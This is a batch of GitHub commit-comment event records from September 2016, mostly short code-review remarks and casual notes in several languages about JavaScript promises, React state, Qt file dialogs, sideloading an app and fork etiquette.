{"id":"4579423637","type":"CommitCommentEvent","actor":{"login":"yhidetoshi"},"repo":{"name":"yhidetoshi/AWS"},"payload":{"comment":{"id":19069714,"position":null,"line":null,"path":null,"commit_id":"4ef2928ea75a472fd9c09cce40508af19c5de8b2","created_at":"2016-09-18T07:22:46Z","updated_at":"2016-09-18T07:22:46Z","body":"JenkinsからAWS-CLIをキック(APIコール)でオペレーション"}},"created_at":"2016-09-18T07:22:46Z"}
{"id":"4579428606","type":"CommitCommentEvent","actor":{"login":"RyanTG"},"repo":{"name":"scottwainstock/pbm"},"payload":{"comment":{"id":19069717,"position":null,"line":null,"path":null,"commit_id":"a67fa09123d5c47b7409107732904e3e0db2460f","created_at":"2016-09-18T07:26:18Z","updated_at":"2016-09-18T07:26:18Z","body":"I adjusted the titles https://github.com/RyanTG/pbm/commit/24a23be21f6539e47fa51899d3fd26630a064c2d\r\n\r\nIn that commit, I did not address this comment - https://github.com/scottwainstock/pbm/commit/a67fa09123d5c47b7409107732904e3e0db2460f#commitcomment-19069479 - about including the 'profile' link in the menu even when logged out. I didn't touch it because I don't exactly know what \"!Authorization.current_user.is_a?(Authorization::AnonymousUser)\" means. What is anonymous user? Just any not-logged in user?\r\nAlso, what do you think about including that link in the menu for ALL users?"}},"created_at":"2016-09-18T07:26:18Z"}
{"id":"4579429336","type":"CommitCommentEvent","actor":{"login":"ndmitchell"},"repo":{"name":"haskell/filepath"},"payload":{"comment":{"id":19069719,"position":null,"line":null,"path":null,"commit_id":"07b334b406a45057a80e821e72c4b973117caae9","created_at":"2016-09-18T07:26:52Z","updated_at":"2016-09-18T07:26:52Z","body":"In cabal head, cabal check gives a warning if you have extra docs without the bound. Being cabal warning free seems preferable, but happy if the cabal devs remove that warning or allow selective suppression. "}},"created_at":"2016-09-18T07:26:52Z"}
{"id":"4579430165","type":"CommitCommentEvent","actor":{"login":"fanfnagjie"},"repo":{"name":"fanfnagjie/test"},"payload":{"comment":{"id":19069721,"position":null,"line":null,"path":null,"commit_id":"da6ec6c8748583733954fc6ee62ad5b514166298","created_at":"2016-09-18T07:27:29Z","updated_at":"2016-09-18T07:27:29Z","body":"啊"}},"created_at":"2016-09-18T07:27:29Z"}
{"id":"4579431825","type":"CommitCommentEvent","actor":{"login":"JacobHeater"},"repo":{"name":"JacobHeater/dessertJS"},"payload":{"comment":{"id":19069726,"position":null,"line":null,"path":null,"commit_id":"5d185db9110f97c60fe8ebf680c9226710e78523","created_at":"2016-09-18T07:28:33Z","updated_at":"2016-09-18T07:28:33Z","body":"Need to continue refactoring/improving component architecture.\r\nNeed to refactor application init in other examples."}},"created_at":"2016-09-18T07:28:33Z"}
{"id":"4579432256","type":"CommitCommentEvent","actor":{"login":"aritaku"},"repo":{"name":"aritaku/tableView_sample"},"payload":{"comment":{"id":19069728,"position":15,"line":15,"path":"tableview_cell_edit/ListViewController.swift","commit_id":"12381d155e98d9f1532445e279ddd5d7952065ab","created_at":"2016-09-18T07:28:51Z","updated_at":"2016-09-18T07:28:51Z","body":"certainly"}},"created_at":"2016-09-18T07:28:51Z"}
{"id":"4579433691","type":"CommitCommentEvent","actor":{"login":"NerimaRentai"},"repo":{"name":"b1621ry/team_project"},"payload":{"comment":{"id":19069730,"position":1,"line":1,"path":"NerimaRentai.html","commit_id":"32a0b3279f5ed9e52db9442f9a216fd49ecc43b5","created_at":"2016-09-18T07:29:53Z","updated_at":"2016-09-18T07:29:53Z","body":"ok\r\n"}},"created_at":"2016-09-18T07:29:53Z"}
{"id":"4579433843","type":"CommitCommentEvent","actor":{"login":"TakanariKida"},"repo":{"name":"TakanariKida/study"},"payload":{"comment":{"id":19069731,"position":null,"line":null,"path":null,"commit_id":"971f8869990c0a5ccf7b3541170c6e575d52e5c7","created_at":"2016-09-18T07:29:59Z","updated_at":"2016-09-18T07:29:59Z","body":"init"}},"created_at":"2016-09-18T07:29:59Z"}
{"id":"4579434391","type":"CommitCommentEvent","actor":{"login":"bokatan"},"repo":{"name":"tumblr/policy"},"payload":{"comment":{"id":19069732,"position":null,"line":null,"path":null,"commit_id":"10a83db20735bd930f6dc2a6ab4dca4299b800bf","created_at":"2016-09-18T07:30:20Z","updated_at":"2016-09-18T07:30:20Z","body":"Then @aidan-fitz how is your buddy @alolmeha right? \r\n\r\n> `It's \"hypocritical\" for someone to commit copyright infringement and then accuse someone else of infringing their copyrights. However, as I'm about to argue, fan art generally does not violate copyright.`\r\n\r\nFan art, by it's very nature DOES violate copyright even if you extol the virtues of FAIR USE.  Fair use of some one else's intellectual property, and then the DEMAND for attribution under the threat of duress to be reported to Tumblr is a VIOLATION of copyright; and the artwork, including derivatives is NO LONGER FAIR USE, because of the DEMAND through threat - it is indicative of a commercial venture or remuneration for the ART itself, inherently including its content. Recognition in name is branding for the art, which makes it a commercial venture. Fair use inherently includes freedom to express, not to profit directly off the item.\r\n\r\nI know this for a fact because I received threats from Tumblr users who report my account to the staff. Then, I was told by staff that my account would be deleted - for posting FAN ART that I found on search programs. I run a business with a legal small business license and EIN, so deleting my account is would be detrimental to my blog. \r\n\r\nFan fiction has nothing to do with my discussion. I am unwilling to add another concept to have a raise the bar logic. My discussion is fan art, only. If you want to have hurt feelings, you can show me the entire literature to justify your position. But I know what I know and I know I'm right. That's my cognitive dissonance. "}},"created_at":"2016-09-18T07:30:20Z"}
{"id":"4579434813","type":"CommitCommentEvent","actor":{"login":"Apsu"},"repo":{"name":"onelson/CocosEX"},"payload":{"comment":{"id":19069734,"position":6,"line":5,"path":"Classes/systems/Spinner.cpp","commit_id":"15d882bb646d5ec03428997f7f042261dccf6b44","created_at":"2016-09-18T07:30:39Z","updated_at":"2016-09-18T07:30:39Z","body":"👍 "}},"created_at":"2016-09-18T07:30:39Z"}
{"id":"4579435119","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19069736,"position":null,"line":null,"path":null,"commit_id":"48adbb4ad64dc18db1d4197d1a3b7de4292f8199","created_at":"2016-09-18T07:30:54Z","updated_at":"2016-09-18T07:30:54Z","body":"Deshalb war es ja auch das Einfachste, es dann schlicht wieder in -core zu verpflanzen.\r\n"}},"created_at":"2016-09-18T07:30:54Z"}
{"id":"4579435295","type":"CommitCommentEvent","actor":{"login":"fritsch"},"repo":{"name":"Kwiboo/LibreELEC.tv"},"payload":{"comment":{"id":19069737,"position":null,"line":null,"path":null,"commit_id":"132408bd0c1a1d52cfc47af8480538ed2f13722e","created_at":"2016-09-18T07:31:01Z","updated_at":"2016-09-18T07:31:01Z","body":"Basically we should have exactly zero code changes in ALSA Sink, the only thing I see that should be needed is opening 2 hw channels for TrueHD/DTS-HD instead of 8 as we normally do.\r\n\r\nThe device handling here would be automatically done in a correct way if you only enable PT capabilities for the hdmi / spdif out, but handling the other device as a PCM device. Kodi won't open any PT on PCM cards.\r\n\r\nBtw. do you develop somewhere on git, much easier to review."}},"created_at":"2016-09-18T07:31:01Z"}
{"id":"4579435620","type":"CommitCommentEvent","actor":{"login":"CodeJjang"},"repo":{"name":"linnovate/replay-common"},"payload":{"comment":{"id":19069738,"position":30,"line":48,"path":"replay-schemas/VideoCompartment.js","commit_id":"b1f5d006c2fa15da740011f5e14a71d885077105","created_at":"2016-09-18T07:31:15Z","updated_at":"2016-09-18T07:31:15Z","body":"Don't think this should be a class function, since it contains wider logic than what the class itself represents... Probably a separated module. If and when this module will be used in several places, we can either put it in replay-common or as an external service if it has enough logic."}},"created_at":"2016-09-18T07:31:15Z"}
{"id":"4579436694","type":"CommitCommentEvent","actor":{"login":"bane1608"},"repo":{"name":"bane1608/GOOD-AFTERNOON-PEOPLES"},"payload":{"comment":{"id":19069739,"position":null,"line":null,"path":null,"commit_id":"01ccd4e87649baa4b69eff5acdeab0e2aa70d93c","created_at":"2016-09-18T07:32:09Z","updated_at":"2016-09-18T07:32:09Z","body":"HELLO WORLD\r\n"}},"created_at":"2016-09-18T07:32:09Z"}
{"id":"4579444461","type":"CommitCommentEvent","actor":{"login":"lucasmichot"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":19069762,"position":null,"line":null,"path":null,"commit_id":"b5bfac08209462ad49a91ef2d21fb34e6b39233a","created_at":"2016-09-18T07:37:44Z","updated_at":"2016-09-18T07:37:44Z","body":"@themsaid @GrahamCampbell - Can we not automate that with http://changehub.io ?"}},"created_at":"2016-09-18T07:37:44Z"}
{"id":"4579444724","type":"CommitCommentEvent","actor":{"login":"CodeJjang"},"repo":{"name":"linnovate/replay-common"},"payload":{"comment":{"id":19069764,"position":64,"line":83,"path":"replay-schemas/VideoCompartment.js","commit_id":"b1f5d006c2fa15da740011f5e14a71d885077105","created_at":"2016-09-18T07:37:56Z","updated_at":"2016-09-18T07:37:56Z","body":"try:\r\nfunction getUserPermissions(userCode) = Promise.method(function(userCode) {\r\n// return normally like async function\r\n// ...\r\n}"}},"created_at":"2016-09-18T07:37:56Z"}
{"id":"4579445826","type":"CommitCommentEvent","actor":{"login":"CodeJjang"},"repo":{"name":"linnovate/replay-common"},"payload":{"comment":{"id":19069767,"position":101,"line":120,"path":"replay-schemas/VideoCompartment.js","commit_id":"b1f5d006c2fa15da740011f5e14a71d885077105","created_at":"2016-09-18T07:38:44Z","updated_at":"2016-09-18T07:38:44Z","body":"Either wrap the whole function in new Promise or use Promise.method, what if xml2js.parser throws?"}},"created_at":"2016-09-18T07:38:44Z"}
{"id":"4579447231","type":"CommitCommentEvent","actor":{"login":"CodeJjang"},"repo":{"name":"linnovate/replay-common"},"payload":{"comment":{"id":19069775,"position":30,"line":48,"path":"replay-schemas/VideoCompartment.js","commit_id":"b1f5d006c2fa15da740011f5e14a71d885077105","created_at":"2016-09-18T07:39:56Z","updated_at":"2016-09-18T07:39:56Z","body":"Also dont forget to remove unused dependencies after that"}},"created_at":"2016-09-18T07:39:56Z"}
{"id":"4579447443","type":"CommitCommentEvent","actor":{"login":"gonenduk"},"repo":{"name":"gonenduk/basejs"},"payload":{"comment":{"id":19069776,"position":null,"line":null,"path":null,"commit_id":"e588a9961e01554a83610e1634af0410ad46826e","created_at":"2016-09-18T07:40:04Z","updated_at":"2016-09-18T07:40:04Z","body":"I agree. The original idea was not to run the code if not configured, but it is better to log a warning. This way, the developer knows he needs not to include this module or configure it."}},"created_at":"2016-09-18T07:40:04Z"}
{"id":"4579453219","type":"CommitCommentEvent","actor":{"login":"CodeJjang"},"repo":{"name":"linnovate/replay-infra"},"payload":{"comment":{"id":19069782,"position":35,"line":35,"path":"authorization-ui/api/services/set-video-authorization.js","commit_id":"b77f3367fccd50ed858ab67e4386f3a860ad7b2f","created_at":"2016-09-18T07:44:23Z","updated_at":"2016-09-18T07:44:23Z","body":".then() should return a promise even if is last in promise chain"}},"created_at":"2016-09-18T07:44:23Z"}
{"id":"4579454128","type":"CommitCommentEvent","actor":{"login":"varund7726"},"repo":{"name":"ResurrectionRemix/Resurrection_packages_apps_Settings"},"payload":{"comment":{"id":19069783,"position":null,"line":null,"path":null,"commit_id":"3ee0f8179a4eec89679fefd4c2ae1ad970c89457","created_at":"2016-09-18T07:45:00Z","updated_at":"2016-09-18T07:45:00Z","body":"because we are not going to make it public till we make actual release\r\nmany users build and share builds without our permission and take credit for it"}},"created_at":"2016-09-18T07:45:00Z"}
{"id":"4579454212","type":"CommitCommentEvent","actor":{"login":"AvalancheYT"},"repo":{"name":"GodOP/GodOPMod"},"payload":{"comment":{"id":19069784,"position":null,"line":null,"path":null,"commit_id":"93fb3a6f67bf9e133b623dac87445300bedf8a56","created_at":"2016-09-18T07:45:03Z","updated_at":"2016-09-18T07:45:03Z","body":"Wrong class xD\r\n"}},"created_at":"2016-09-18T07:45:03Z"}
{"id":"4579455415","type":"CommitCommentEvent","actor":{"login":"harrywhit97"},"repo":{"name":"JamesTuerlings/IFB299_Group114"},"payload":{"comment":{"id":19069788,"position":null,"line":null,"path":null,"commit_id":"cd64a56ce29c3daea552be331a82ea257faa57a4","created_at":"2016-09-18T07:45:55Z","updated_at":"2016-09-18T07:45:55Z","body":"Added but incomplete: delivery schedule (with working database intergration) , basic login, staff home page.\r\n        "}},"created_at":"2016-09-18T07:45:55Z"}
{"id":"4579456989","type":"CommitCommentEvent","actor":{"login":"yhoiseth"},"repo":{"name":"voku/Stringy"},"payload":{"comment":{"id":19069791,"position":null,"line":null,"path":null,"commit_id":"3096bc84d887ad3c974410a7e17b369b4f2843d8","created_at":"2016-09-18T07:47:04Z","updated_at":"2016-09-18T07:47:04Z","body":"Hi @voku,\r\n\r\nI'm glad you found this useful.\r\n\r\nMay I ask what your motivation for forking Stringy is? I'm asking because I'm wondering if I should use your fork rather than the original Stringy."}},"created_at":"2016-09-18T07:47:04Z"}
{"id":"4579457950","type":"CommitCommentEvent","actor":{"login":"tf-feifei"},"repo":{"name":"tf-feifei/second-2"},"payload":{"comment":{"id":19069793,"position":null,"line":null,"path":null,"commit_id":"e9a0f4717cc8013ed6fe4d343a46d29c38c65e3c","created_at":"2016-09-18T07:47:44Z","updated_at":"2016-09-18T07:47:44Z","body":"public class HelloWorld {\r\npublic static void main (String[] args){\r\n\tSystem.out.println(\"Hello World!\");\r\n}\r\n}\r\n"}},"created_at":"2016-09-18T07:47:44Z"}
{"id":"4579458191","type":"CommitCommentEvent","actor":{"login":"aleksxor"},"repo":{"name":"BrandyMint/kiosk-public-static-v2"},"payload":{"comment":{"id":19069795,"position":17,"line":63,"path":"app/scripts/react/reducers/cart.js","commit_id":"498f24c072225f0b6bc527cdf3913f8eae4dc249","created_at":"2016-09-18T07:47:55Z","updated_at":"2016-09-18T07:47:55Z","body":"особенно, если сравнить с тем что именно этот код заменил )\r\n```\r\n  changeField(name, value) {\r\n    const { fields } = this.state;\r\n\r\n    this.setState({\r\n      fields: fields.map((field) => {\r\n        if (field.source.name === name) {\r\n          return {...field, value};\r\n        }\r\n        return field;\r\n      }),\r\n    });\r\n  }\r\n```\r\n\r\nhttps://github.com/BrandyMint/kiosk-public-static-v2/blob/bb38809edb4f7230c00c05df6c1da89d84d71772/app/scripts/react/components/Cart/CartContainer.jsx#L105-L116"}},"created_at":"2016-09-18T07:47:55Z"}
{"id":"4579458826","type":"CommitCommentEvent","actor":{"login":"rodrial12"},"repo":{"name":"PopcornTimeTV/PopcornTimeTV"},"payload":{"comment":{"id":19069796,"position":null,"line":null,"path":null,"commit_id":"a60efb55fb5d81ffc5dace4b90eb8f4e0e9d14c3","created_at":"2016-09-18T07:48:22Z","updated_at":"2016-09-18T07:48:22Z","body":"Thanks for the quick reply.\r\nI already resign the ipa with ipwnstore utility.\r\nHowever i keep getting error# e8000087 on ifunbox for mac.\r\nI am running tvos 10."}},"created_at":"2016-09-18T07:48:22Z"}
{"id":"4579459065","type":"CommitCommentEvent","actor":{"login":"CodeJjang"},"repo":{"name":"linnovate/replay-infra"},"payload":{"comment":{"id":19069797,"position":118,"line":118,"path":"authorization-ui/api/services/set-video-authorization.js","commit_id":"b77f3367fccd50ed858ab67e4386f3a860ad7b2f","created_at":"2016-09-18T07:48:32Z","updated_at":"2016-09-18T07:48:32Z","body":"and return; (I know it should return because it finished the loop but it's a better practice)"}},"created_at":"2016-09-18T07:48:32Z"}
{"id":"4579463937","type":"CommitCommentEvent","actor":{"login":"CodeJjang"},"repo":{"name":"linnovate/replay-infra"},"payload":{"comment":{"id":19069799,"position":224,"line":224,"path":"authorization-ui/api/services/set-video-authorization.js","commit_id":"b77f3367fccd50ed858ab67e4386f3a860ad7b2f","created_at":"2016-09-18T07:51:47Z","updated_at":"2016-09-18T07:51:47Z","body":"If this logic presents already in @oldwisenir code, then extract it (you or him) to a separated module which you will both share, don't copy code... especially when its not a trivial one, as we only use geometry field from the turf result... It is error prone spot"}},"created_at":"2016-09-18T07:51:47Z"}
{"id":"4579464177","type":"CommitCommentEvent","actor":{"login":"vuquan710"},"repo":{"name":"TeamISD/3"},"payload":{"comment":{"id":19069800,"position":null,"line":null,"path":null,"commit_id":"fe2fbb4d5bedf2695a8f760d17bfc41e7efe102b","created_at":"2016-09-18T07:51:57Z","updated_at":"2016-09-18T07:51:57Z","body":"what's the fuck goin on?"}},"created_at":"2016-09-18T07:51:57Z"}
{"id":"4579464653","type":"CommitCommentEvent","actor":{"login":"JiuJiu119"},"repo":{"name":"JiuJiu119/tong"},"payload":{"comment":{"id":19069802,"position":null,"line":null,"path":null,"commit_id":"c95bd04c60e328cc49793fcd11e7e19212989b32","created_at":"2016-09-18T07:52:16Z","updated_at":"2016-09-18T07:52:16Z","body":"first add "}},"created_at":"2016-09-18T07:52:16Z"}
{"id":"4579464698","type":"CommitCommentEvent","actor":{"login":"aleksxor"},"repo":{"name":"BrandyMint/kiosk-public-static-v2"},"payload":{"comment":{"id":19069803,"position":12,"line":12,"path":"app/scripts/react/actions/PackagesActions.js","commit_id":"a3ba2aa53a4df4fa69ce22fe963c9b1f9c65640c","created_at":"2016-09-18T07:52:18Z","updated_at":"2016-09-18T07:52:18Z","body":"дело вкуса, на самом деле. мне нравится работать с полями в camelCase\r\nв существующем проекте, правда, который еще довольно сильно полагается на внутреннюю структуру данных, иногда не всегда элегантно проходит. в частности, в money презентеры которые ожидают `currency_iso_code` как внутреннее поле представления валюты приходится передавать decamelized версию данных. зато нет скачем с именами внутри компонентов"}},"created_at":"2016-09-18T07:52:18Z"}
{"id":"4579465909","type":"CommitCommentEvent","actor":{"login":"CodeJjang"},"repo":{"name":"linnovate/replay-infra"},"payload":{"comment":{"id":19069807,"position":205,"line":205,"path":"authorization-ui/api/services/set-video-authorization.js","commit_id":"b77f3367fccd50ed858ab67e4386f3a860ad7b2f","created_at":"2016-09-18T07:53:04Z","updated_at":"2016-09-18T07:53:04Z","body":"This should also be included in the separated module"}},"created_at":"2016-09-18T07:53:04Z"}
{"id":"4579466580","type":"CommitCommentEvent","actor":{"login":"aleksxor"},"repo":{"name":"BrandyMint/kiosk-public-static-v2"},"payload":{"comment":{"id":19069808,"position":43,"line":50,"path":"app/scripts/react/components/Cart/index.jsx","commit_id":"ceffdd3ffd2f488c360fcc20d5b51e9d73e41800","created_at":"2016-09-18T07:53:35Z","updated_at":"2016-09-18T07:53:35Z","body":"в ноде можно. а в mini_racer, оказалось - нет."}},"created_at":"2016-09-18T07:53:35Z"}
{"id":"4579468889","type":"CommitCommentEvent","actor":{"login":"johnmccabe"},"repo":{"name":"briancain/vmfloaty"},"payload":{"comment":{"id":19069810,"position":null,"line":null,"path":null,"commit_id":"86e1792775578f850e597f0f4c7b85ea7b88cf34","created_at":"2016-09-18T07:55:14Z","updated_at":"2016-09-18T07:55:14Z","body":":sunglasses:"}},"created_at":"2016-09-18T07:55:14Z"}
{"id":"4579469205","type":"CommitCommentEvent","actor":{"login":"CodeJjang"},"repo":{"name":"linnovate/replay-infra"},"payload":{"comment":{"id":19069811,"position":94,"line":94,"path":"authorization-ui/api/services/set-video-authorization.js","commit_id":"b77f3367fccd50ed858ab67e4386f3a860ad7b2f","created_at":"2016-09-18T07:55:27Z","updated_at":"2016-09-18T07:55:27Z","body":"What about sourceId?"}},"created_at":"2016-09-18T07:55:27Z"}
{"id":"4579469323","type":"CommitCommentEvent","actor":{"login":"a493832816"},"repo":{"name":"a493832816/a493832816.github.io"},"payload":{"comment":{"id":19069812,"position":null,"line":null,"path":null,"commit_id":"428b9eb48298760a881804f32c6f0b586609ce93","created_at":"2016-09-18T07:55:32Z","updated_at":"2016-09-18T07:55:32Z","body":"这是我第一个github"}},"created_at":"2016-09-18T07:55:32Z"}
{"id":"4579469386","type":"CommitCommentEvent","actor":{"login":"gonenduk"},"repo":{"name":"gonenduk/basejs"},"payload":{"comment":{"id":19069813,"position":null,"line":null,"path":null,"commit_id":"e588a9961e01554a83610e1634af0410ad46826e","created_at":"2016-09-18T07:55:35Z","updated_at":"2016-09-18T07:55:35Z","body":"Done. Commit 12c78986b7016d885f0a96267c89db39cf6b8fde"}},"created_at":"2016-09-18T07:55:35Z"}
{"id":"4579470243","type":"CommitCommentEvent","actor":{"login":"aleksxor"},"repo":{"name":"BrandyMint/kiosk-public-static-v2"},"payload":{"comment":{"id":19069814,"position":11,"line":42,"path":"app/scripts/react/reducers/cart.js","commit_id":"755d45a95e72698402f570b7383490c46788ccec","created_at":"2016-09-18T07:56:11Z","updated_at":"2016-09-18T07:56:11Z","body":"количества вынесены в отдельную структуру чтобы были отделены от редко изменяемых данных. Сергей, я видел, менял прямо внутри переданных структур. мне этот подход не близок.\r\nаналогичная ситуация со значениями полей форм в чекауте. значения отделены от описаний полей форм"}},"created_at":"2016-09-18T07:56:11Z"}
{"id":"4579470819","type":"CommitCommentEvent","actor":{"login":"huangshengxing"},"repo":{"name":"huangshengxing/Hello-World"},"payload":{"comment":{"id":19069816,"position":null,"line":null,"path":null,"commit_id":"9903770e89eecade5dca56bec522fa4967aa8076","created_at":"2016-09-18T07:56:35Z","updated_at":"2016-09-18T07:56:35Z","body":"_i am trying to learn the amazing GitHub._"}},"created_at":"2016-09-18T07:56:35Z"}
{"id":"4579470840","type":"CommitCommentEvent","actor":{"login":"chenyu1520"},"repo":{"name":"ibireme/YYText"},"payload":{"comment":{"id":19069817,"position":null,"line":null,"path":null,"commit_id":"01da2806f32656399bac517e60ff932dc542d168","created_at":"2016-09-18T07:56:35Z","updated_at":"2016-09-18T07:56:35Z","body":"太好了。不过悲剧的是，我们线上的版本论坛的大量信息没有显示出来，也怪我们自己没有早升级做测试。。。"}},"created_at":"2016-09-18T07:56:35Z"}
{"id":"4579470968","type":"CommitCommentEvent","actor":{"login":"CodeJjang"},"repo":{"name":"linnovate/replay-infra"},"payload":{"comment":{"id":19069818,"position":103,"line":103,"path":"authorization-ui/api/services/set-video-authorization.js","commit_id":"b77f3367fccd50ed858ab67e4386f3a860ad7b2f","created_at":"2016-09-18T07:56:43Z","updated_at":"2016-09-18T07:56:43Z","body":"FYI mongoose updates are normally like $set operator but its ok"}},"created_at":"2016-09-18T07:56:43Z"}
{"id":"4579471062","type":"CommitCommentEvent","actor":{"login":"skneos"},"repo":{"name":"RememberTheAir/GroupButler"},"payload":{"comment":{"id":19069819,"position":null,"line":null,"path":null,"commit_id":"f8613d4a11439b70d5b089a798dbbc9dafe1f9aa","created_at":"2016-09-18T07:56:47Z","updated_at":"2016-09-18T07:56:47Z","body":"Bug in lines 319 and 328, causes crash when launch the bot.\nReplace 'then' to 'do'."}},"created_at":"2016-09-18T07:56:47Z"}
{"id":"4579471610","type":"CommitCommentEvent","actor":{"login":"dterweij"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":19069820,"position":null,"line":null,"path":null,"commit_id":"a912c9a2658dbbf8321d5d063d63cf673825106c","created_at":"2016-09-18T07:57:11Z","updated_at":"2016-09-18T07:57:11Z","body":"Fork and Copy are just the  same things.   The only difference is that you removed the history. But basicly the commits from PocketMine-MP <> Genisys at some point in history are just the same till the Copy point.\r\nAfter the Copy point it is still a Fork aka Copy aka Custom version. \r\nTho Custom version suits better as naming after a Copy point."}},"created_at":"2016-09-18T07:57:11Z"}
{"id":"4579472890","type":"CommitCommentEvent","actor":{"login":"CodeJjang"},"repo":{"name":"linnovate/replay-infra"},"payload":{"comment":{"id":19069822,"position":115,"line":115,"path":"authorization-ui/api/services/set-video-authorization.js","commit_id":"b77f3367fccd50ed858ab67e4386f3a860ad7b2f","created_at":"2016-09-18T07:58:06Z","updated_at":"2016-09-18T07:58:06Z","body":"No promise returned..."}},"created_at":"2016-09-18T07:58:06Z"}
{"id":"4579474495","type":"CommitCommentEvent","actor":{"login":"huangshengxing"},"repo":{"name":"huangshengxing/Hello-World"},"payload":{"comment":{"id":19069824,"position":null,"line":null,"path":null,"commit_id":"9903770e89eecade5dca56bec522fa4967aa8076","created_at":"2016-09-18T07:59:09Z","updated_at":"2016-09-18T07:59:09Z","body":"i wrote the commit acc to the guide."}},"created_at":"2016-09-18T07:59:09Z"}
{"id":"4579474783","type":"CommitCommentEvent","actor":{"login":"chengmin99"},"repo":{"name":"chengmin99/CSS"},"payload":{"comment":{"id":19069825,"position":null,"line":null,"path":null,"commit_id":"a0d9e915717bdd053558c2b0b46554c913f5e36a","created_at":"2016-09-18T07:59:21Z","updated_at":"2016-09-18T07:59:21Z","body":"哈哈哈。。。"}},"created_at":"2016-09-18T07:59:21Z"}
{"id":"4579475375","type":"CommitCommentEvent","actor":{"login":"aleksxor"},"repo":{"name":"BrandyMint/kiosk-public-static-v2"},"payload":{"comment":{"id":19069826,"position":25,"line":115,"path":"app/scripts/react/components/Cart/index.jsx","commit_id":"bf918496b5d56c078db56b3b366186c907e2d31a","created_at":"2016-09-18T07:59:46Z","updated_at":"2016-09-18T07:59:46Z","body":"это как раз страховка на случай если что-нибудь пойдет не так. т.е. это не замена defaultProps а дополнение"}},"created_at":"2016-09-18T07:59:46Z"}
{"id":"4579476264","type":"CommitCommentEvent","actor":{"login":"arnaud-morvan"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19069827,"position":null,"line":null,"path":null,"commit_id":"eba61013574bff36f03f791ec4e1b4fdadce43d5","created_at":"2016-09-18T08:00:14Z","updated_at":"2016-09-18T08:00:14Z","body":"This (file, filter = QFileDialog.getOpenFileName) seems not need for me on Ubuntu 16.04 with Qt5.\r\nNot documented in Qt5.7 API.\r\nDo you have met some errors with another distribution ?\r\nIs is possible to revert ? As we could keep working processing on top of master with python2, waiting for compatibility with Python3.\r\n\r\n"}},"created_at":"2016-09-18T08:00:14Z"}
{"id":"4579477752","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":19069830,"position":null,"line":null,"path":null,"commit_id":"a912c9a2658dbbf8321d5d063d63cf673825106c","created_at":"2016-09-18T08:01:02Z","updated_at":"2016-09-18T08:01:02Z","body":"@dterweij what we care is that `git blame` is different, and that's everything. Now instead of blaming @shoghicp we have to blame @PeratX instead."}},"created_at":"2016-09-18T08:01:02Z"}
{"id":"4579477792","type":"CommitCommentEvent","actor":{"login":"aleksxor"},"repo":{"name":"BrandyMint/kiosk-public-static-v2"},"payload":{"comment":{"id":19069831,"position":25,"line":115,"path":"app/scripts/react/components/Cart/index.jsx","commit_id":"bf918496b5d56c078db56b3b366186c907e2d31a","created_at":"2016-09-18T08:01:04Z","updated_at":"2016-09-18T08:01:04Z","body":"дальше я обращаюсь к этим данным как к immutable объектам и если вдруг что-то не было получено в нужном виде мне нужны дефолтные объекты а не undefined"}},"created_at":"2016-09-18T08:01:04Z"}
{"id":"4579480286","type":"CommitCommentEvent","actor":{"login":"aleksxor"},"repo":{"name":"BrandyMint/kiosk-public-static-v2"},"payload":{"comment":{"id":19069834,"position":25,"line":115,"path":"app/scripts/react/components/Cart/index.jsx","commit_id":"bf918496b5d56c078db56b3b366186c907e2d31a","created_at":"2016-09-18T08:02:40Z","updated_at":"2016-09-18T08:02:40Z","body":"оно, вполне, может поломаться и не на этапе получения начальных данных, а например, после каких-нибудь неучтенных заранее взаимодействий с пользователем. сложно предугадать все варианты изменения данных которые могут меняться и пользователем и сервером. поэтому такие страховки"}},"created_at":"2016-09-18T08:02:40Z"}
{"id":"4579481757","type":"CommitCommentEvent","actor":{"login":"rodrial12"},"repo":{"name":"PopcornTimeTV/PopcornTimeTV"},"payload":{"comment":{"id":19069837,"position":null,"line":null,"path":null,"commit_id":"a60efb55fb5d81ffc5dace4b90eb8f4e0e9d14c3","created_at":"2016-09-18T08:03:42Z","updated_at":"2016-09-18T08:03:42Z","body":"It actually works with the link of 1.0.3.1 version by resigning the ipa.\r\nHowever the last link with 1.0.5 does not work by resigning it.\r\nI can see that 1.0.5 ipa size is only 18mb compared to the 82 mb size of 1.0.3.1. Does this have anything to do?"}},"created_at":"2016-09-18T08:03:42Z"}
{"id":"4579481843","type":"CommitCommentEvent","actor":{"login":"dapi"},"repo":{"name":"BrandyMint/kiosk-public-static-v2"},"payload":{"comment":{"id":19069838,"position":12,"line":12,"path":"app/scripts/react/actions/PackagesActions.js","commit_id":"a3ba2aa53a4df4fa69ce22fe963c9b1f9c65640c","created_at":"2016-09-18T08:03:45Z","updated_at":"2016-09-18T08:03:45Z","body":"понятно что нравится, но если есть требование работать в JS с camekCase то не проще ли это требование транслировать в API и быть уверенным что всегда в JS camelCase? Ведь так читая код никогда не узнаешь camelCase там или underscore, пока не продержишь."}},"created_at":"2016-09-18T08:03:45Z"}
{"id":"4579483363","type":"CommitCommentEvent","actor":{"login":"CodeJjang"},"repo":{"name":"linnovate/replay-infra"},"payload":{"comment":{"id":19069840,"position":120,"line":120,"path":"authorization-ui/api/services/set-video-authorization.js","commit_id":"b77f3367fccd50ed858ab67e4386f3a860ad7b2f","created_at":"2016-09-18T08:04:08Z","updated_at":"2016-09-18T08:04:08Z","body":"It's ok but why not .catch for consistency?"}},"created_at":"2016-09-18T08:04:08Z"}
{"id":"4579483963","type":"CommitCommentEvent","actor":{"login":"smmaci"},"repo":{"name":"ColeHoff7/hackMIT"},"payload":{"comment":{"id":19069841,"position":1,"line":1,"path":"conversatio_app/templates/conversatio_app/index.html","commit_id":"8089c5bdebf3d68316ce67c3c6d42ba253e9d4c1","created_at":"2016-09-18T08:04:33Z","updated_at":"2016-09-18T08:04:33Z","body":"AHAHAHFH"}},"created_at":"2016-09-18T08:04:33Z"}
